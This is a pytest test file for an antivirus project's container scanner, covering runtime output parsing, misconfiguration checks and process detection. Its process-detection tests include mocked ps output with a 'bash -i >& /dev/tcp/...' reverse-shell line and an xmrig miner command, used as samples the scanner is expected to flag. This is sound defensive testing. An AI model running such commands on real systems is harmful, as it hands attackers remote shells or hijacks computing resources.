# File: calvana/ayn-antivirus/tests/test_container_scanner.py
# 406 lines, 14 KiB, Python

"""Tests for the container scanner module."""
from __future__ import annotations
import json
from unittest.mock import patch
import pytest
from ayn_antivirus.scanners.container_scanner import (
ContainerInfo,
ContainerScanResult,
ContainerScanner,
ContainerThreat,
)
# ---------------------------------------------------------------------------
# Data class tests
# ---------------------------------------------------------------------------
class TestContainerInfo:
    """Checks for the ``ContainerInfo`` data class."""

    def test_defaults(self):
        """Fields that are not supplied come back as empty/zero values."""
        info = ContainerInfo(
            container_id="abc",
            name="web",
            image="nginx",
            status="running",
            runtime="docker",
            created="2026-01-01",
        )

        assert info.ports == []
        assert info.mounts == []
        assert info.pid == 0
        assert info.ip_address == ""
        assert info.labels == {}

    def test_to_dict(self):
        """``to_dict`` carries the id, ports and labels through unchanged."""
        field_values = dict(
            container_id="abc",
            name="web",
            image="nginx:1.25",
            status="running",
            runtime="docker",
            created="2026-01-01",
            ports=["80:80"],
            mounts=["/data"],
            pid=42,
            ip_address="10.0.0.2",
            labels={"env": "prod"},
        )

        serialised = ContainerInfo(**field_values).to_dict()

        assert serialised["container_id"] == "abc"
        assert serialised["ports"] == ["80:80"]
        assert serialised["labels"] == {"env": "prod"}
class TestContainerThreat:
    """Serialisation checks for the ``ContainerThreat`` data class."""

    def test_to_dict(self):
        """``to_dict`` exposes the threat name, severity and a timestamp."""
        threat = ContainerThreat(
            container_id="abc",
            container_name="web",
            runtime="docker",
            threat_name="Miner.X",
            threat_type="miner",
            severity="CRITICAL",
            details="found xmrig",
        )

        serialised = threat.to_dict()

        assert serialised["threat_name"] == "Miner.X"
        assert serialised["severity"] == "CRITICAL"
        # NOTE(review): 19 characters presumably corresponds to a
        # "YYYY-MM-DD HH:MM:SS" stamp -- confirm against the data class.
        assert len(serialised["timestamp"]) == 19

    def test_optional_fields(self):
        """``file_path`` and ``process_name`` appear in the dict when set."""
        threat = ContainerThreat(
            container_id="x",
            container_name="y",
            runtime="podman",
            threat_name="T",
            threat_type="malware",
            severity="HIGH",
            details="d",
            file_path="/tmp/bad",
            process_name="evil",
        )

        serialised = threat.to_dict()

        assert serialised["file_path"] == "/tmp/bad"
        assert serialised["process_name"] == "evil"
class TestContainerScanResult:
    """Checks for the ``ContainerScanResult`` data class."""

    def test_empty_is_clean(self):
        """A result with no threats and no end time is clean with zero duration."""
        result = ContainerScanResult(
            scan_id="t",
            start_time="2026-01-01 00:00:00",
        )

        assert result.is_clean is True
        assert result.duration_seconds == 0.0

    def test_with_threats(self):
        """One threat makes the result dirty; duration spans start to end."""
        threat = ContainerThreat(
            container_id="a",
            container_name="b",
            runtime="docker",
            threat_name="T",
            threat_type="miner",
            severity="HIGH",
            details="d",
        )

        result = ContainerScanResult(
            scan_id="t",
            start_time="2026-01-01 00:00:00",
            end_time="2026-01-01 00:00:10",
            threats=[threat],
        )

        assert result.is_clean is False
        assert result.duration_seconds == 10.0

    def test_to_dict(self):
        """``to_dict`` reports threat count, duration and collected errors."""
        result = ContainerScanResult(
            scan_id="t",
            start_time="2026-01-01 00:00:00",
            end_time="2026-01-01 00:00:03",
            containers_found=2,
            containers_scanned=1,
            errors=["oops"],
        )

        serialised = result.to_dict()

        assert serialised["threats_found"] == 0
        assert serialised["duration_seconds"] == 3.0
        assert serialised["errors"] == ["oops"]
# ---------------------------------------------------------------------------
# Scanner tests
# ---------------------------------------------------------------------------
class TestContainerScanner:
    """Behavioural checks for ``ContainerScanner`` that need no mocking."""

    def test_properties(self):
        """The scanner exposes its name, a description and a runtime list."""
        scanner = ContainerScanner()

        assert scanner.name == "container_scanner"
        assert "Docker" in scanner.description
        assert isinstance(scanner.available_runtimes, list)

    def test_no_runtimes_graceful(self):
        """With no runtimes installed scan returns an error, not an exception."""
        scanner = ContainerScanner()
        # Simulate a host where no container runtime was detected.
        scanner._available_runtimes = []
        scanner._docker_cmd = None
        scanner._podman_cmd = None
        scanner._lxc_cmd = None

        result = scanner.scan("all")

        assert isinstance(result, ContainerScanResult)
        assert result.containers_found == 0
        assert len(result.errors) == 1
        assert "No container runtimes" in result.errors[0]

    def test_scan_returns_result(self):
        """``scan`` always yields a populated ``ContainerScanResult``."""
        # NOTE(review): this uses whatever runtimes the host really has,
        # so it is not hermetic.
        result = ContainerScanner().scan("all")

        assert isinstance(result, ContainerScanResult)
        assert result.scan_id
        assert result.start_time
        assert result.end_time

    def test_scan_container_delegates(self):
        """``scan_container`` returns a ``ContainerScanResult``."""
        scanner = ContainerScanner()
        scanner._available_runtimes = []

        result = scanner.scan_container("some-id")

        assert isinstance(result, ContainerScanResult)

    def test_run_cmd_timeout(self):
        """A command that outlives its timeout yields rc -1 and a message."""
        _, stderr, rc = ContainerScanner._run_cmd(["sleep", "10"], timeout=1)

        assert rc == -1
        assert "timed out" in stderr.lower()

    def test_run_cmd_not_found(self):
        """A missing executable yields rc -1 and a 'not found' style message."""
        _, stderr, rc = ContainerScanner._run_cmd(
            ["this_command_does_not_exist_xyz"],
        )

        assert rc == -1
        # Match both accepted phrasings case-insensitively; previously only
        # the first alternative ignored case.
        message = stderr.lower()
        assert "not found" in message or "no such file" in message

    def test_find_command(self):
        """``_find_command`` resolves a known binary and rejects a bogus one."""
        # python3 should exist everywhere
        # NOTE(review): assumes a ``python3`` executable is on PATH.
        assert ContainerScanner._find_command("python3") is not None
        assert ContainerScanner._find_command("no_such_binary_xyz") is None
# ---------------------------------------------------------------------------
# Mock-based integration tests
# ---------------------------------------------------------------------------
class TestDockerParsing:
    """Test Docker output parsing with mocked subprocess calls."""

    def _make_scanner(self):
        """Return a scanner that is configured as if only Docker exists."""
        scanner = ContainerScanner()
        scanner._docker_cmd = "/usr/bin/docker"
        scanner._available_runtimes = ["docker"]
        return scanner

    def test_list_docker_parses_output(self):
        """``_list_docker`` merges the ``ps`` row with the inspect payload."""
        ps_output = (
            "abc123456789\tweb\tnginx:1.25\tUp 2 hours\t"
            "2026-01-01 00:00:00\t0.0.0.0:80->80/tcp"
        )
        inspect_payload = [{
            "State": {"Pid": 42},
            "NetworkSettings": {"Networks": {"bridge": {"IPAddress": "172.17.0.2"}}},
            "Mounts": [{"Source": "/data"}],
            "Config": {"Labels": {"app": "web"}},
        }]
        inspect_output = json.dumps(inspect_payload)

        # Replies are consumed in call order: docker ps, then docker inspect.
        canned_replies = [
            (ps_output, "", 0),
            (inspect_output, "", 0),
        ]

        scanner = self._make_scanner()
        with patch.object(scanner, "_run_cmd", side_effect=canned_replies):
            containers = scanner._list_docker()

        assert len(containers) == 1
        container = containers[0]
        assert container.name == "web"
        assert container.image == "nginx:1.25"
        assert container.status == "running"
        assert container.runtime == "docker"
        assert container.pid == 42
        assert container.ip_address == "172.17.0.2"
        assert "/data" in container.mounts
        assert container.labels == {"app": "web"}

    def test_list_docker_ps_failure(self):
        """A non-zero exit from the listing command gives an empty list."""
        scanner = self._make_scanner()
        failed = ("", "error", 1)

        with patch.object(scanner, "_run_cmd", return_value=failed):
            assert scanner._list_docker() == []

    def test_inspect_docker_bad_json(self):
        """Unparseable inspect output is turned into an empty dict."""
        scanner = self._make_scanner()
        garbage = ("not json", "", 0)

        with patch.object(scanner, "_run_cmd", return_value=garbage):
            assert scanner._inspect_docker("abc") == {}
class TestPodmanParsing:
    """Test Podman listing with a mocked ``_run_cmd``."""

    def test_list_podman_parses_json(self):
        """``_list_podman`` builds one container from a JSON listing."""
        scanner = ContainerScanner()
        scanner._podman_cmd = "/usr/bin/podman"
        scanner._available_runtimes = ["podman"]

        listing = [{
            "Id": "def456789012abcdef",
            "Names": ["db"],
            "Image": "postgres:16",
            "State": "running",
            "Created": "2026-01-01",
            "Ports": [{"hostPort": 5432, "containerPort": 5432}],
            "Pid": 99,
            "Labels": {},
        }]
        canned_reply = (json.dumps(listing), "", 0)

        with patch.object(scanner, "_run_cmd", return_value=canned_reply):
            containers = scanner._list_podman()

        assert len(containers) == 1
        only = containers[0]
        assert only.name == "db"
        assert only.runtime == "podman"
        assert only.pid == 99
class TestLXCParsing:
    """Test LXC listing with a mocked ``_run_cmd``."""

    def test_list_lxc_parses_output(self):
        """``_list_lxc`` skips the header row and parses one container line."""
        scanner = ContainerScanner()
        scanner._lxc_cmd = "/usr/bin/lxc-ls"
        scanner._available_runtimes = ["lxc"]

        lxc_output = "NAME STATE IPV4 PID\ntest1 RUNNING 10.0.3.5 1234"
        canned_reply = (lxc_output, "", 0)

        with patch.object(scanner, "_run_cmd", return_value=canned_reply):
            containers = scanner._list_lxc()

        assert len(containers) == 1
        only = containers[0]
        assert only.name == "test1"
        assert only.status == "running"
        assert only.ip_address == "10.0.3.5"
        assert only.pid == 1234
class TestMisconfigDetection:
    """Test misconfiguration detection with mocked inspect output."""

    def _scan_misconfig(self, inspect_data):
        """Run ``_check_misconfigurations`` with *inspect_data* as the mocked reply."""
        scanner = ContainerScanner()
        scanner._docker_cmd = "/usr/bin/docker"
        target = ContainerInfo(
            container_id="abc",
            name="test",
            image="img",
            status="running",
            runtime="docker",
            created="",
        )
        # The payload is wrapped in a list before being serialised.
        canned_reply = (json.dumps([inspect_data]), "", 0)

        with patch.object(scanner, "_run_cmd", return_value=canned_reply):
            return scanner._check_misconfigurations(target)

    def _threat_names(self, inspect_data):
        """Return the ``threat_name`` of every threat found for *inspect_data*."""
        return [t.threat_name for t in self._scan_misconfig(inspect_data)]

    def test_privileged_mode(self):
        """``Privileged: True`` is reported."""
        found = self._threat_names({
            "HostConfig": {"Privileged": True},
            "Config": {"User": "app"},
        })
        assert "PrivilegedMode.Container" in found

    def test_root_user(self):
        """An empty ``User`` is reported as running as root."""
        found = self._threat_names({
            "HostConfig": {},
            "Config": {"User": ""},
        })
        assert "RunAsRoot.Container" in found

    def test_host_network(self):
        """``NetworkMode: host`` is reported."""
        found = self._threat_names({
            "HostConfig": {"NetworkMode": "host"},
            "Config": {"User": "app"},
        })
        assert "HostNetwork.Container" in found

    def test_host_pid(self):
        """``PidMode: host`` is reported."""
        found = self._threat_names({
            "HostConfig": {"PidMode": "host"},
            "Config": {"User": "app"},
        })
        assert "HostPID.Container" in found

    def test_dangerous_caps(self):
        """Each added dangerous capability gets its own threat entry."""
        found = self._threat_names({
            "HostConfig": {"CapAdd": ["SYS_ADMIN", "NET_RAW"]},
            "Config": {"User": "app"},
        })
        assert "DangerousCap.Container.SYS_ADMIN" in found
        assert "DangerousCap.Container.NET_RAW" in found

    def test_sensitive_mount(self):
        """Mounting the Docker socket is reported as a sensitive mount."""
        found = self._threat_names({
            "HostConfig": {},
            "Config": {"User": "app"},
            "Mounts": [{"Source": "/var/run/docker.sock", "Destination": "/var/run/docker.sock"}],
        })
        assert "SensitiveMount.Container" in found

    def test_no_resource_limits(self):
        """Zero memory and CPU quota are reported as missing limits."""
        found = self._threat_names({
            "HostConfig": {"Memory": 0, "CpuQuota": 0},
            "Config": {"User": "app"},
        })
        assert "NoResourceLimits.Container" in found

    def test_security_disabled(self):
        """``seccomp=unconfined`` is reported as disabled security."""
        found = self._threat_names({
            "HostConfig": {"SecurityOpt": ["seccomp=unconfined"]},
            "Config": {"User": "app"},
        })
        assert "SecurityDisabled.Container" in found

    def test_clean_config(self):
        """A non-root user with resource limits set yields no threats."""
        threats = self._scan_misconfig({
            "HostConfig": {"Memory": 512000000, "CpuQuota": 50000},
            "Config": {"User": "app"},
        })
        # Should have no misconfig threats
        assert len(threats) == 0
class TestImageCheck:
    """Checks for ``ContainerScanner._check_image`` tag handling."""

    def _image_threats(self, image):
        """Run ``_check_image`` on a running Docker container using *image*."""
        container = ContainerInfo(
            container_id="a",
            name="b",
            image=image,
            status="running",
            runtime="docker",
            created="",
        )
        return ContainerScanner._check_image(container)

    def test_latest_tag(self):
        """An explicit ``:latest`` tag is flagged."""
        threats = self._image_threats("nginx:latest")
        assert any("LatestTag" in t.threat_name for t in threats)

    def test_no_tag(self):
        """An image with no tag at all is flagged the same way."""
        threats = self._image_threats("nginx")
        assert any("LatestTag" in t.threat_name for t in threats)

    def test_pinned_tag(self):
        """A pinned version tag produces no threats."""
        threats = self._image_threats("nginx:1.25.3")
        assert len(threats) == 0
class TestProcessDetection:
    """Checks for ``_check_processes`` using mocked process listings."""

    def _make_scanner_and_container(self):
        """Return a Docker-configured scanner and a running container."""
        scanner = ContainerScanner()
        scanner._docker_cmd = "/usr/bin/docker"
        container = ContainerInfo(
            container_id="abc",
            name="test",
            image="img",
            status="running",
            runtime="docker",
            created="",
        )
        return scanner, container

    def _process_threat_names(self, ps_output):
        """Return threat names found when ``_run_cmd`` yields *ps_output*."""
        scanner, container = self._make_scanner_and_container()
        canned_reply = (ps_output, "", 0)
        with patch.object(scanner, "_run_cmd", return_value=canned_reply):
            threats = scanner._check_processes(container)
        return [t.threat_name for t in threats]

    def test_miner_detected(self):
        """An ``xmrig`` process line is reported as a crypto miner."""
        ps_output = (
            "USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\n"
            "root 1 95.0 8.0 123456 65432 ? Sl 00:00 1:23 /usr/bin/xmrig --pool pool.example.com"
        )

        found = self._process_threat_names(ps_output)

        assert any("CryptoMiner" in name for name in found)

    def test_reverse_shell_detected(self):
        """A ``bash -i`` redirect to ``/dev/tcp`` is reported as a reverse shell."""
        ps_output = (
            "USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\n"
            "root 1 0.1 0.0 1234 432 ? S 00:00 0:00 bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
        )

        found = self._process_threat_names(ps_output)

        assert any("ReverseShell" in name for name in found)

    def test_stopped_container_skipped(self):
        """A stopped container yields no process threats."""
        scanner, container = self._make_scanner_and_container()
        container.status = "stopped"

        # _get_exec_prefix returns None for stopped containers
        threats = scanner._check_processes(container)

        assert threats == []